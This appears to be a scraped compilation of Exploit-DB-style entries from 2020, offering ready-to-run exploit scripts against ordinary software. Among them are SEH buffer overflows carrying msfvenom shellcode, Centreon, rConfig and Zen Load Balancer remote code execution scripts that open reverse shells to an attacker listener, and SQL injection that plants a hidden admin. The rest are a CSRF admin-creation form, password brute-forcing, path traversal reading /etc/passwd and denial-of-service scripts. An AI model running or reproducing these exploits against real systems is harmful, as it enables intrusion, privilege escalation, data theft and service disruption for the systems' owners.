ISHACK AI BOT

# Exploit Title: 10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH) # Date: 2020-03-24 # Author: Felipe Winsnes # Vendor Homepage: https://www.10-strike.com/ # Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe # Version: 8.54 # Tested on: Windows 7 # Proof of Concept: # 1.- Run the python script "poc.py", it will create a new file "poc.txt" # 2.- Copy the content of the new file 'poc.txt' to clipboard # 3.- Open the Application # 4.- Go to 'Main' or 'Computers' # 5.- Click upon 'Add' # 6.- Paste clipboard on 'Computer' parameter, under the title "Computer Card" # 7.- Click "OK" # 8.- Profit # Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/Strike-Network-Inventory-Explorer-Structered-Exception-Handling-Overwrite/ import struct # msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed # Payload size: 448 bytes buf = b"" buf += b"\x89\xe2\xda\xc3\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49" buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x39\x6c\x78\x68\x4f" buf += b"\x72\x47\x70\x63\x30\x57\x70\x63\x50\x4d\x59\x4b\x55" buf += b"\x55\x61\x49\x50\x45\x34\x6c\x4b\x50\x50\x36\x50\x4c" buf += b"\x4b\x53\x62\x56\x6c\x4e\x6b\x33\x62\x44\x54\x4e\x6b" buf += b"\x42\x52\x54\x68\x74\x4f\x68\x37\x50\x4a\x56\x46\x44" buf += b"\x71\x49\x6f\x6e\x4c\x45\x6c\x63\x51\x53\x4c\x53\x32" buf += b"\x76\x4c\x61\x30\x5a\x61\x58\x4f\x74\x4d\x76\x61\x49" buf += b"\x57\x59\x72\x5a\x52\x46\x32\x56\x37\x6c\x4b\x30\x52" buf += b"\x36\x70\x6c\x4b\x73\x7a\x57\x4c\x4c\x4b\x30\x4c\x64" buf += b"\x51\x70\x78\x7a\x43\x33\x78\x75\x51\x68\x51\x70\x51" buf += b"\x4c\x4b\x76\x39\x55\x70\x67\x71\x38\x53\x4e\x6b\x31" buf += b"\x59\x66\x78\x38\x63\x45\x6a\x51\x59\x6c\x4b\x70\x34" buf += b"\x4c\x4b\x57\x71\x59\x46\x45\x61\x59\x6f\x6e\x4c\x4b" buf += b"\x71\x58\x4f\x66\x6d\x76\x61\x5a\x67\x56\x58\x6b\x50" buf += b"\x73\x45\x49\x66\x75\x53\x71\x6d\x4c\x38\x37\x4b\x43" buf += b"\x4d\x67\x54\x63\x45\x4b\x54\x52\x78\x6c\x4b\x73\x68" buf += b"\x37\x54\x56\x61\x69\x43\x73\x56\x4c\x4b\x76\x6c\x32" buf += b"\x6b\x6e\x6b\x61\x48\x65\x4c\x55\x51\x7a\x73\x6c\x4b" buf += b"\x54\x44\x4e\x6b\x43\x31\x6a\x70\x4b\x39\x32\x64\x35" buf += b"\x74\x55\x74\x63\x6b\x43\x6b\x75\x31\x72\x79\x73\x6a" buf += b"\x56\x31\x59\x6f\x4b\x50\x53\x6f\x51\x4f\x43\x6a\x4c" buf += b"\x4b\x62\x32\x6a\x4b\x4c\x4d\x43\x6d\x63\x5a\x76\x61" buf += b"\x6e\x6d\x6d\x55\x4e\x52\x53\x30\x77\x70\x55\x50\x76" buf += b"\x30\x32\x48\x70\x31\x6c\x4b\x50\x6f\x6f\x77\x69\x6f" buf += b"\x58\x55\x4d\x6b\x4a\x50\x58\x35\x4e\x42\x42\x76\x75" buf += b"\x38\x6f\x56\x6f\x65\x4d\x6d\x6d\x4d\x59\x6f\x39\x45" buf += b"\x77\x4c\x76\x66\x73\x4c\x76\x6a\x4d\x50\x79\x6b\x4d" buf += b"\x30\x70\x75\x37\x75\x6f\x4b\x53\x77\x67\x63\x73\x42" buf += b"\x72\x4f\x50\x6a\x55\x50\x56\x33\x39\x6f\x39\x45\x45" buf += b"\x33\x30\x61\x50\x6c\x70\x63\x34\x6e\x42\x45\x51\x68" buf += b"\x31\x75\x65\x50\x41\x41" nseh = struct.pack("<I", 0x909006EB) seh = struct.pack("<I", 0x61E8497A) # 0x61e8497a : pop esi # pop edi # ret | {PAGE_EXECUTE_READ} [sqlite3.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.12.2 (C:\Program Files\10-Strike Network Inventory Explorer\sqlite3.dll) buffer = "A" * 211 + nseh + seh + "A" * 20 + buf + "\xff" * 200 f = open ("poc.txt", "w") f.write(buffer) f.close()

# Exploit Title: 10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path # Date: 2020-03-24 # Author: Felipe Winsnes # Vendor Homepage: https://www.10-strike.com/ # Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe # Version: 8.54 # Tested on: Windows 7 # Step to discover Unquoted Service Path: C:\Users\IEUser>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ srvInventoryWebServer srvInventoryWebServer C:\Program Files\10-Strike Network Inventory Explorer\InventoryWebServer.exe Auto # Service info: C:\>sc qc srvInventoryWebServer [SC] QueryServiceConfig SUCCESS SERVICE_NAME: srvInventoryWebServer TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\10-Strike Network Inventory Explorer\InventoryWebServer.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : srvInventoryWebServer DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\> # Exploit: # A successful attempt would require the local user to be able to insert their code in the # system root path undetected by the OS or other security applications where it could # potentially be executed during application startup or reboot. If successful, the local # user's code would execute with the elevated privileges of the application.

# Exploit Title: TP-Link Archer C50 3 - Denial of Service (PoC) # Date: 2020-01-25 # Exploit Author: thewhiteh4t # Vendor Homepage: https://www.tp-link.com/ # Version: TP-Link Archer C50 v3 Build 171227 # Tested on: Arch Linux x64 # CVE: CVE-2020-9375 # Description: https://thewhiteh4t.github.io/2020/02/27/CVE-2020-9375-TP-Link-Archer-C50-v3-Denial-of-Service.html import time import socket ip = '192.168.0.1' port = 80 print('[+] IP : ' + ip) print('[+] Port : ' + str(port)) for i in range(2): time.sleep(1) try: print('[+] Initializing Socket...') s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) print('[!] Connecting to target...') s.connect((ip, port)) header = 'GET / HTTP/1.1\r\nHost: {}\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0\r\nReferer: thewhiteh4t\r\n\r\n'.format(ip) header = header.encode() print('[!] Sending Request...') s.sendall(header) print('[!] Disconnecting Socket...') s.close() if i == 1: print('[-] Exploit Failed!') break except Exception as e: if 'Connection refused' in str(e): print('[+] Connection Refused...Exploit Successful!') break else: print('[-] Exploit Failed!') break

# Exploit Title: Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution # Date: 2020-03-25 # Exploit Author: Engin Demirbilek # Vendor Homepage: https://www.centreon.com/ # Version: 19.10.8 # Tested on: CentOS # Advisory link: https://engindemirbilek.github.io/centreon-19.10-rce # Corresponding pull request on github: https://github.com/centreon/centreon/pull/8467#event-3163627607 #!/usr/bin/python import requests import sys import warnings from bs4 import BeautifulSoup warnings.filterwarnings("ignore", category=UserWarning, module='bs4') if len(sys.argv) < 6: print "Usage: ./exploit.py http(s)://url username password listenerIP listenerPort" exit() url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] ip = sys.argv[4] port = sys.argv[5] req = requests.session() print("[+] Retrieving CSRF token...") loginPage = req.get(url+"/index.php") response = loginPage.text s = BeautifulSoup(response, 'html.parser') centreon_token = s.find('input', {'name':'centreon_token'})['value'] login_creds = { "useralias": username, "password": password, "submitLogin": "Connect", "centreon_token": centreon_token } print("[+] Sendin login request...") login = req.post(url+"/index.php", login_creds) if "incorrect" not in login.text: print("[+] Logged In, retrieving second token") page = url + "/main.get.php?p=50118" second_token_req = req.get(page) response = second_token_req.text s = BeautifulSoup(response, 'html.parser') second_token = s.find('input', {'name':'centreon_token'})['value'] payload = { "RRDdatabase_path": "/var/lib/centreon/metrics/", "RRDdatabase_status_path": ";bash -i >& /dev/tcp/{}/{} 0>&1;".format(ip, port), "RRDdatabase_nagios_stats_path": "/var/lib/centreon/nagios-perf/", "reporting_retention": "365", "archive_retention": "31", "len_storage_mysql": "365", "len_storage_rrd": "180", "len_storage_downtimes": "0", "len_storage_comments": "0", "partitioning_retention": "365", "partitioning_retention_forward": "10", "cpartitioning_backup_directory": "/var/cache/centreon/backup", "audit_log_option": "1", "audit_log_retention": "0", "submitC": "Save", "gopt_id": "", "o": "storage", "o": "storage", "centreon_token": second_token, } print("[+] Sendin payload...") send_payload = req.post(page, payload) trigger_url= url + "/include/views/graphs/graphStatus/displayServiceStatus.php" print("[+] Triggerring payload...") trigger = req.get(trigger_url) print("[+] Check your listener !...") else: print("[-] Wrong credentials") exit()

# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH) # Date: 2020-03-26 # Author: Felipe Winsnes # Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe # Version: 2.7.3.700 # Tested on: Windows 7 (x86) # Proof of Concept: # 1.- Run the python script, it will create a new file "poc.txt" # 2.- Copy the content of the new file 'poc.txt' to clipboard # 3.- Open the Application # 4.- If the 'Preferences' windows pops up, just click 'Cancel' # 4.- Click 'Batch' # 5.- Delete everything on the parameter 'Input:' and paste the clipboard there # 6.- Select OK # 7.- Some Windows message boxes will pop up, click OK. # 8.- Profit # Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/Easy-RM-to-MP3-Converter-2.7.3.700-Input/ import struct import sys # msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread # Payload size: 447 bytes buf = b"" buf += b"\xdb\xc4\xd9\x74\x24\xf4\x58\x50\x59\x49\x49\x49\x49" buf += b"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37" buf += b"\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41" buf += b"\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58" buf += b"\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x6b\x58\x4d\x52" buf += b"\x55\x50\x73\x30\x67\x70\x55\x30\x6c\x49\x4a\x45\x65" buf += b"\x61\x69\x50\x62\x44\x6c\x4b\x76\x30\x46\x50\x4e\x6b" buf += b"\x76\x32\x46\x6c\x6c\x4b\x52\x72\x65\x44\x6e\x6b\x72" buf += b"\x52\x74\x68\x44\x4f\x4f\x47\x73\x7a\x64\x66\x65\x61" buf += b"\x49\x6f\x4e\x4c\x47\x4c\x50\x61\x71\x6c\x34\x42\x66" buf += b"\x4c\x71\x30\x6b\x71\x58\x4f\x44\x4d\x46\x61\x68\x47" buf += b"\x4a\x42\x6c\x32\x51\x42\x63\x67\x4c\x4b\x76\x32\x72" buf += b"\x30\x4e\x6b\x33\x7a\x35\x6c\x4c\x4b\x50\x4c\x32\x31" buf += b"\x31\x68\x59\x73\x53\x78\x55\x51\x6b\x61\x70\x51\x4e" buf += b"\x6b\x70\x59\x47\x50\x35\x51\x68\x53\x6e\x6b\x51\x59" buf += b"\x37\x68\x6a\x43\x45\x6a\x62\x69\x6c\x4b\x54\x74\x6c" buf += b"\x4b\x55\x51\x4a\x76\x76\x51\x39\x6f\x6c\x6c\x6b\x71" buf += b"\x4a\x6f\x36\x6d\x77\x71\x6a\x67\x77\x48\x69\x70\x33" buf += b"\x45\x7a\x56\x64\x43\x61\x6d\x68\x78\x45\x6b\x53\x4d" buf += b"\x66\x44\x53\x45\x69\x74\x70\x58\x4e\x6b\x76\x38\x74" buf += b"\x64\x77\x71\x38\x53\x52\x46\x6e\x6b\x34\x4c\x72\x6b" buf += b"\x6e\x6b\x56\x38\x45\x4c\x57\x71\x38\x53\x6c\x4b\x75" buf += b"\x54\x6e\x6b\x76\x61\x4a\x70\x4e\x69\x67\x34\x44\x64" buf += b"\x31\x34\x51\x4b\x73\x6b\x43\x51\x30\x59\x51\x4a\x53" buf += b"\x61\x59\x6f\x49\x70\x31\x4f\x33\x6f\x63\x6a\x6c\x4b" buf += b"\x57\x62\x68\x6b\x6c\x4d\x73\x6d\x42\x4a\x33\x31\x4c" buf += b"\x4d\x4f\x75\x4e\x52\x73\x30\x35\x50\x47\x70\x66\x30" buf += b"\x51\x78\x35\x61\x4e\x6b\x42\x4f\x6f\x77\x59\x6f\x58" buf += b"\x55\x4f\x4b\x4d\x30\x35\x4d\x75\x7a\x65\x5a\x63\x58" buf += b"\x49\x36\x4f\x65\x6d\x6d\x6d\x4d\x79\x6f\x79\x45\x45" buf += b"\x6c\x77\x76\x33\x4c\x57\x7a\x4f\x70\x6b\x4b\x69\x70" buf += b"\x74\x35\x57\x75\x6d\x6b\x33\x77\x65\x43\x43\x42\x62" buf += b"\x4f\x32\x4a\x37\x70\x53\x63\x79\x6f\x6a\x75\x33\x53" buf += b"\x35\x31\x72\x4c\x61\x73\x54\x6e\x61\x75\x61\x68\x75" buf += b"\x35\x57\x70\x41\x41" nseh = struct.pack("<I", 0x06710870) seh = struct.pack("<I", 0x10025A2E) # 0x10025a2e : pop ecx # pop esi # ret | ascii {PAGE_EXECUTE_READ} [MSRMfilter03.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMfilter03.dll) buffer = "A" * 9008 + nseh + seh + "\x41\x49" * 5 + buf + "\xff" * 200 try: f = open ("poc.txt", "w") f.write(buffer) f.close() print "[+] The file has been created successfully!" except: print "[!] There has been an error while creating the file."

# Exploit Title : ECK Hotel 1.0 - Cross-Site Request Forgery (Add Admin) # Product : ECK Hotel # Version : 1.0-beta # Date: 2020-03-26 # Software Download: https://sourceforge.net/projects/eckhotel/files/eck-hotel-v1.0-beta.zip/download # Exploit Author: Mustafa Emre Gül # Website: https://emregul.com.tr/ # Tested On : Win10 x64 # Description : Simple Hotel Management System. PoC: <!--Unauthenticated Create Admin User --> <html> <body> <form action="localhost/index.php?module=user/user-add" method="POST"> <input type="hidden" name="nama" value="meg" /> <input type="hidden" name="id_user_role" value="1" /> <input type="hidden" name="jabatan" value="meg" /> <input type="hidden" name="nomor_telp" value="1" /> <input type="hidden" name="username" value="meg" /> <input type="hidden" name="password" value="meg" /> <input type="hidden" name="user-add" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html>

# Exploit Title: Everest 5.50.2100 - 'Open File' Denial of Service (PoC) # Discovery by: Ivan Marmolejo # Discovery Date: 2020-03-24 # Software Link : http://www.lavalys.com/ # Tested Version: 5.50.2100 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 10 Home Single Language # Steps to produce the crash: #1.- Run python code: Everest.py #2.- Open Everest.txt and copy content to clipboard #3.- Open "Everest Ultimate Edition" #4.- Select "Informe" > "Asistente de Informes" > "Next" > Select "Abrir Archivo" #5.- In "Abrir Archivo" field paste Clipboard #6.- Select "Next" #7.- Crashed buffer = "\x41" * 450 f = open ("Everest.txt", "w") f.write(buffer) f.close()

# Exploit Title: Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal # Date: 2020-03-26 # Exploit Author: hongphukt # Vendor Homepage: https://www.jinfonet.com/ # Software Link: https://www.jinfonet.com/product/download-jreport/ # Version: JReport 15.6 # Tested on: Linux, Windows Jreport Help function have a path traversal vulnerability in the SendFileServlet allows remote unauthenticated users to view any files on the Operating System with Application services user permission. This vulnerability affects Windows and Unix operating systems. Technical Details Jreport before loggedin have help function with url: https://serverip/jreport/sendfile/help/userguide/server/index.htm senfile url processing by jet.server.servlets.SendFileServlet class. <servlet> <servlet-name>sendfile</servlet-name> <servlet-class>jet.server.servlets.SendFileServlet</servlet-class> </servlet> <servlet-mapping> <servlet-name>sendfile</servlet-name> <url-pattern>/sendfile/*</url-pattern> </servlet-mapping> In jet.server.servlets.SendFileServlet class, request will go on when it’s authenticated or start url by ‘/help/’ if ((!isAuthentic) && (!path.startsWith("/help/"))) { httpRptServer.getHttpUserSessionManager().sendUnauthorizedResponse(req, res, this.D, httpRptServer.getResourceManager().getRealm()); return; } So the function reading file without any path validation Exploit: Get login properties, /etc/password file by get url: http://jreport.test/jreport/sendfile/help/../bin/login.properties http://jreport.test/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd # Exploit Code import requests import argparse def exploit(url, file): session = requests.Session() rawBody = "\r\n" response = session.get("{}/jreport/sendfile/help/{}".format(url,file), data=rawBody) if response.status_code == 404: print("The '{}' file was not found.".format(file)) else: print("-" *22) print(response.content) print("-" *22) if __name__ == "__main__": parser = argparse.ArgumentParser(description='Jreport Path traversal & Arbitrary File Download') parser.add_argument('-u', action="store", dest="url", required=True, help='Target URL') parser.add_argument('-f', action="store", dest="file", required=True, help='The file to download') args = parser.parse_args() exploit(args.url, args.file) # python jreport_fileread.py -u http://jreport.address -f "../../../../../../../../../../../../../../etc/passwd/" # python jreport_fileread.py -u http://jreport.address -f "../bin/login.properties" # python jreport_fileread.py -u http://jreport.address -f "../bin/server.properties"

# Exploit Title: rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution # Exploit Author: vikingfr # Greetz : Orange Cyberdefense - team CSR-SO (https://cyberdefense.orange.com) # Date: 2020-03-12 # CVE-2019-19509 + CVE-2019-19585 + CVE-2020-10220 # Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_root_RCE_unauth.py # Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig) # Software Link : https://www.rconfig.com/downloads/rconfig-3.9.4.zip # Install scripts : # https://www.rconfig.com/downloads/scripts/install_rConfig.sh # https://www.rconfig.com/downloads/scripts/centos7_install.sh # https://www.rconfig.com/downloads/scripts/centos6_install.sh # Version: tested v3.9.4 # Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24 # # Notes : If you want to reproduce in your lab environment follow those links : # http://help.rconfig.com/gettingstarted/installation # then # http://help.rconfig.com/gettingstarted/postinstall # # Example : # $ python3 rconfig_root_RCE_unauth_final.py http://1.1.1.1 1.1.1.2 3334 # rConfig - 3.9 - Unauthenticated root RCE # [+] Adding a temporary admin user... # [+] Authenticating as dywzxuvbah... # [+] Logged in successfully, triggering the payload... # [+] Check your listener ! # [+] The reverse shell seems to be opened :-) # [+] Removing the temporary admin user... # [+] Done. # # $ nc -nvlp 3334 # listening on [any] 3334 ... # connect to [1.1.1.2] from (UNKNOWN) [1.1.1.1] 46186 # sh: no job control in this shell # sh-4.2# id # id # uid=0(root) gid=0(root) groups=0(root) # sh-4.2# #!/usr/bin/python3 import requests import sys import urllib.parse import string import random from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) from requests.exceptions import Timeout print ("rConfig - 3.9 - Unauthenticated root RCE") if len(sys.argv) != 4: print ("[+] Usage : ./rconfig_exploit.py https://target yourIP yourPort") exit() target = sys.argv[1] ip = sys.argv[2] port = sys.argv[3] vuln_page="/commands.inc.php" vuln_parameters="?searchOption=contains&searchField=vuln&search=search&searchColumn=command" def generateUsername(stringLength=8): u= string.ascii_lowercase return ''.join(random.sample(u,stringLength)) print ("[+] Adding a temporary admin user...") fake_id = str(random.randint(200,900)) fake_user = generateUsername(10) fake_pass_md5 = "21232f297a57a5a743894a0e4a801fc3" # hash of 'admin' fake_userid_md5 = "6c97424dc92f14ae78f8cc13cd08308d" userleveladmin = 9 # Administrator addUserPayload="%20;INSERT%20INTO%20`users`%20(`id`,%20`username`,%20`password`,%20`userid`,%20`userlevel`,%20`email`,%20`timestamp`,%20`status`)%20VALUES%20("+fake_id+",%20'"+fake_user+"',%20'"+fake_pass_md5+"',%20'"+fake_userid_md5+"',%209,%20'"+fake_user+"@domain.com',%201346920339,%201);--" encoded_request = target+vuln_page+vuln_parameters+addUserPayload firstrequest = requests.session() exploit_req = firstrequest.get(encoded_request,verify=False) request = requests.session() login_info = { "user": fake_user, "pass": "admin", "sublogin": 1 } print ("[+] Authenticating as "+fake_user+"...") login_request = request.post( target+"/lib/crud/userprocess.php", login_info, verify=False, allow_redirects=True ) dashboard_request = request.get(target+"/dashboard.php", allow_redirects=False) payload = ''' `touch /tmp/.'''+fake_user+'''.txt;sudo zip -q /tmp/.'''+fake_user+'''.zip /tmp/.'''+fake_user+'''.txt -T -TT '/bin/sh -i>& /dev/tcp/{0}/{1} 0>&1 #'` '''.format(ip, port) if dashboard_request.status_code == 200: print ("[+] Logged in successfully, triggering the payload...") encoded_request = target+"/lib/ajaxHandlers/ajaxArchiveFiles.php?path={0}&ext=random".format(urllib.parse.quote(payload)) print ("[+] Check your listener !") try: exploit_req = request.get(encoded_request,timeout=10) except Timeout: print('[+] The reverse shell seems to be opened :-)') else: print('[-] The command was not executed by the target or you forgot to open a listener...') elif dashboard_request.status_code == 302: print ("[-] Wrong credentials !? Maybe admin were not added...") exit() print("[+] Removing the temporary admin user...") delUserPayload="%20;DELETE%20FROM%20`users`%20WHERE%20`username`='"+fake_user+"';--" encoded_request = target+vuln_page+vuln_parameters+delUserPayload lastrequest = requests.session() exploit_req = lastrequest.get(encoded_request,verify=False) print ("[+] Done.")

# Exploit Title: Odin Secure FTP Expert 7.6.3 - 'Site Info' Denial of Service (PoC) # Discovery by: Ivan Marmolejo # Discovery Date: 2020-03-27 # Vendor Homepage: https://odin-secure-ftp-expert.jaleco.com/ # Software Link Download : http://tr.oldversion.com/windows/odin-secure-ftp-expert-7-6-3 # Version : Odin Secure FTP Expert 7.6.3 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 10 Home Single Lenguage (ESP) Steps to Produce the Crash: 1.- Run python code: OdinSecureFTP.py 2.- Copy content to clipboard 3.- Open "OdinSecureFTPExpert.exe" 4.- Go to "Trial" > Connect > Quickconnect site 5.- Paste ClipBoard into the all fields 6.- Go to Connect 7.- Crashed Python "OdinSecureFTP" Code: buffer = "\x41" * 108 f = open ("OdinSecureFTP.txt", "w") f.write(buffer) f.close()

# Exploit Title: Joomla! com_fabrik 3.9.11 - Directory Traversal #Google Dork: inurl:"index.php?option=com_fabrik" #Date: 2020-03-30 #Exploit Author: qw3rTyTy #Vendor Homepage: https://fabrikar.com/ #Software Link: https://fabrikar.com/downloads #Version: 3.9 #Tested on: Debian/Nginx/Joomla! 3.9.11 ################################################################## #Vulnerability details ################################################################## File: fabrik_element/image/image.php Func: onAjax_files 394 public function onAjax_files() 395 { 396 $this->loadMeForAjax(); 397 $folder = $this->app->input->get('folder', '', 'string'); //!!!Possible to directory-traversal. 398 399 if (!strstr($folder, JPATH_SITE)) 400 { 401 $folder = JPATH_SITE . '/' . $folder; 402 } 403 404 $pathA = JPath::clean($folder); 405 $folder = array(); 406 $files = array(); 407 $images = array(); 408 FabrikWorker::readImages($pathA, "/", $folders, $images, $this->ignoreFolders); 409 410 if (!array_key_exists('/', $images)) 411 { 412 $images['/'] = array(); 413 } 414 415 echo json_encode($images['/']); 416 } ################################################################## #PoC ################################################################## $> curl -X GET -i "http://127.0.0.1/joomla/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../tmp/" ...snip... [{"value":"eila.jpg","text":"eila.jpg","disable":false},{"value":"eilanya.jpg","text":"eilanya.jpg","disable":false},{"value":"topsecret.png","text":"topsecret.png","disable":false}] ...snip... $> curl -X GET -i "http://127.0.0.1/joomla/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../home/user123/Pictures/" ...snip... [{"value":"Revision2017_Banner.jpg","text":"Revision2017_Banner.jpg","disable":false},{"value":"Screenshot from 2019-02-23 22-43-54.png","text":"Screenshot from 2019-02-23 22-43-54.png","disable":false},{"value":"Screenshot from 2019-03-09 14-59-22.png","text":"Screenshot from 2019-03-09 14-59-22.png","disable":false},{"value":"Screenshot from 2019-03-09 14-59-25.png","text":"Screenshot from 2019-03-09 14-59-25.png","disable":false},{"value":"Screenshot from 2019-03-16 23-17-05.png","text":"Screenshot from 2019-03-16 23-17-05.png","disable":false},{"value":"Screenshot from 2019-03-18 07-30-41.png","text":"Screenshot from 2019-03-18 07-30-41.png","disable":false},{"value":"Screenshot from 2019-03-18 08-23-45.png","text":"Screenshot from 2019-03-18 08-23-45.png","disable":false},{"value":"Screenshot from 2019-04-08 00-09-36.png","text":"Screenshot from 2019-04-08 00-09-36.png","disable":false},{"value":"Screenshot from 2019-04-08 10-34-23.png","text":"Screenshot from 2019-04-08 10-34-23.png","disable":false},{"value":"Screenshot from 2019-04-13 08-23-48.png","text":"Screenshot from 2019-04-13 08-23-48.png","disable":false},{"value":"Screenshot from 2019-05-24 23-14-05.png","text":"Screenshot from 2019-05-24 23-14-05.png","disable":false},{"value":"b.jpg","text":"b.jpg","disable":false},{"value":"by_gh0uli.tumblr.com-8755.png.jpeg","text":"by_gh0uli.tumblr.com-8755.png.jpeg","disable":false},{"value":"max_payne_06.jpg","text":"max_payne_06.jpg","disable":false},{"value":"xxx.jpg","text":"xxx.jpg","disable":false}] ...snip... ################################################################## #Q&D Patch (DO NOT USE :3) ################################################################## --- ./image.php --- +++ image_patched.php --- @@ -394,7 +394,7 @@ public function onAjax_files() { $this->loadMeForAjax(); - $folder = $this->app->input->get('folder', '', 'string'); + $folder = $this->app->input->get('folder', '', 'cmd'); if (!strstr($folder, JPATH_SITE)) {

# Exploit Title: Zen Load Balancer 3.10.1 - Remote Code Execution # Google Dork: no # Date: 2020-03-28 # Exploit Author: Cody Sixteen # Vendor Homepage: https://code610.blogspot.com # Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download # Version: 3.10.1 # Tested on: Linux # CVE : CVE-2019-7301 #c@kali:~/src/eonila/zenload3r$ cat zenload3r.py #!/usr/bin/env python # zenload3r.py - zen load balancer pwn3r # 28.03.2020 @ 22:41 # # by cody sixteen # import base64 import sys, re import requests import ssl from functools import partial ssl.wrap_socket = partial(ssl.wrap_socket, ssl_version=ssl.PROTOCOL_TLSv1) # disable ssl warnings: import urllib3 urllib3.disable_warnings() from requests.auth import HTTPBasicAuth # target = sys.argv[1] username = 'admin' password = 'P@ssw0rd' def main(): print 'zenload3r.py - zen load balancer pwn3r' print ' zenload3r.py - vs - %s' % ( target ) print '' print '[+] checking if host is alive...' global sess sess = requests.session() global baseUrl baseUrl = target + ':444/index.cgi' checkBaseUrl = sess.get(baseUrl, verify=False) checkBaseResp = checkBaseUrl.status_code #print checkBaseResp if checkBaseResp == 401: print '[i] ...it is. we need to log in to proceed' logmein(baseUrl) def logmein(target): print '[+] trying %s and default password "%s" vs %s' % (username, password, baseUrl) #pwd_file = '/usr/share/wordlists/dirb/common.txt' pwd_file = 'passwd.lst' try: read_pwds = open(pwd_file, 'r') pwds = read_pwds.readlines() for pwd in pwds: pwd = pwd.rstrip() logme = sess.post(baseUrl, auth=HTTPBasicAuth(username,pwd), allow_redirects=True) logmeresp = logme.text #print logmeresp if '<p>Hello <strong>admin</strong>' in logmeresp: print '[+] admin user logged-in! :D' print '[+] working password: %s' % ( pwd ) load3r(baseUrl, pwd) except requests.exceptions.ConnectionError: print '[-] Can not connect to remote host :C\n' def load3r(baseUrl, pwd): print '[+] time to get reverse shell, preparing...' creds = base64.b64encode("{}:{}".format(username,pwd)) creds2 = creds.rstrip() print 'creds: ', creds2 baseUrl = "https://192.168.1.200:444/index.cgi" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "pl,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://192.168.1.200:444", "Authorization": "Basic {}".format(creds2), "Connection": "close", "Referer": "https://192.168.1.200:444/index.cgi?id=1-3&action=Show_Form", "Upgrade-Insecure-Requests": "1" } sh = "a\";nc 192.168.1.170 4444 -e /bin/sh;#" reqdata = {"cert_name": "qweqweqwe", "cert_issuer": "Sofintel", "cert_fqdn": "qweqweqwe", "cert_division": "qweqweqwe", "cert_organization": sh, "cert_locality": "qweqweqwe", "cert_state": "qweqweqwe", "cert_country": "qw", "cert_mail": "[email protected]", "cert_key": "2048", "id": "1-3", "actionpost": "Generate CSR", "button": "Generate CSR"} requests.post(baseUrl, headers=headers, data=reqdata,verify=False) print '[*] got r00t? ;>\n' # run me: if __name__ == '__main__': main()

